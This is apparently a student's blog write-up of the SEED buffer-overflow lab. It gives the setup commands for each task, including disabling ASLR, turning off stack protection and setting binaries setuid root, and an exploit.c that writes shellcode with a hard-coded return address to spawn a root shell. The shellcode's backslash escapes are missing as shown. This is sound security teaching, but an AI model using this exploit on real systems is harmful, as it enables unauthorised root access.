zoukankan      html  css  js  c++  java
  • Buffer-Overflow Vulnerability Lab

    实验概述

    • Buffer overflow 定义  Buffer overflow is defined as the condition in which a program attempts to write data beyond the boundaries of pre-allocated fixed length buffers.

    • 缓冲区溢出存在的问题 This vulnerability can be utilized by a malicious user to alter the flow control of the program, even execute arbitrary pieces of code. This vulnerability arises due to the mixing of the storage for data (e.g. buffers) and the storage for controls (e.g. return addresses): an overflow in the data part can affect the control flow of the program, because an overflow can change the return address.

    实验目的

    The task is to develop a scheme to exploit the vulnerability and finally gain the root privilege. In addition to the attacks, students will be guided to walk through several protection schemes that have been implemented in the operating system to counter against buffer-overflow attacks. Students need to evaluate whether the schemes work or not and explain why.

    实验内容

    Task1

    sudo sysctl -w kernel.randomize_va_space=0
    
    sudo rm /bin/sh
    sudo ln -s /bin/zsh /bin/sh
    
    gcc -z execstack -o call_shellcode call_shellcode.c
    

    Task2

    sudo sysctl -w kernel.randomize_va_space=0
    
    sudo rm /bin/sh
    sudo ln -s /bin/zsh /bin/sh
    
    gcc -o stack -z execstack -fno-stack-protector stack.c 
    sudo chown root stack 
    sudo chmod 4755 stack # chmod 4755 filename可使此程序具有root的权限
    
    gcc -o exploit exploit.c 
    

    exploit.c

    /* exploit.c  */
    
    /* A program that creates a file containing code for launching shell*/
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    char shellcode[]=
        "x31xc0"             /* xorl    %eax,%eax              */
        "x50"                 /* pushl   %eax                   */
        "x68""//sh"           /* pushl   $0x68732f2f            */
        "x68""/bin"           /* pushl   $0x6e69622f            */
        "x89xe3"             /* movl    %esp,%ebx              */
        "x50"                 /* pushl   %eax                   */
        "x53"                 /* pushl   %ebx                   */
        "x89xe1"             /* movl    %esp,%ecx              */
        "x99"                 /* cdq                            */
        "xb0x0b"             /* movb    $0x0b,%al              */
        "xcdx80"             /* int     $0x80                  */
    ;
    
    void main(int argc, char **argv)
    {
        char buffer[517];
        FILE *badfile;
    
        /* Initialize buffer with 0x90 (NOP instruction) */
        memset(&buffer, 0x90, 517);
    
        /* You need to fill the buffer with appropriate contents here */
        strcpy(buffer + 100, shellcode);                    //将shellcode拷贝至buffer
        strcpy(buffer + 0x24, "x5cxebxffxbf");          //在buffer特定偏移处起始的四个字节覆盖sellcode地址
        /* Save the contents to the file "badfile" */
        badfile = fopen("./badfile", "w");
        fwrite(buffer, 517, 1, badfile);
        fclose(badfile);
    }
    

    Task3

    sudo rm /bin/sh
    sudo ln -s /bin/dash /bin/sh
    
    gcc dash_shell_test.c -o dash_shell_test
    sudo chown root dash_shell_test
    sudo chmod 4755 dash_shell_test
    
    gcc -o exploit_task3 exploit_task3.c 
    

    Task4

    sudo /sbin/sysctl -w kernel.randomize_va_space=2
    
    sh task4.sh
    

    Task5

    sudo sysctl -w kernel.randomize_va_space=0
    
    gcc -o stack -z execstack stack.c 
    sudo chown root stack 
    sudo chmod 4755 stack 
    

    Task6

    sudo sysctl -w kernel.randomize_va_space=0
    
    gcc -o stack -fno-stack-protector -z noexecstack stack.c
    sudo chown root stack 
    sudo chmod 4755 stack
    
  • 相关阅读:
    如何用Chrome浏览器下载网页音乐视频
    《C语言深度解剖》学习笔记之函数
    《C语言深度解剖》学习笔记之内存管理
    《C语言深度解剖》学习笔记之指针和数组
    《C语言深度解剖》学习笔记之预处理
    《C语言深度解剖》学习笔记之符号
    《C语言深度解剖》学习笔记之关键字
    CKA1.20版本2021年1月31日最新版本真题,第三题升级master节点
    CKA1.20版本2021年1月31日最新版本真题,第一题RBAC
    Linux之curl命令
  • 原文地址:https://www.cnblogs.com/solvit/p/11970383.html
Copyright © 2011-2022 走看看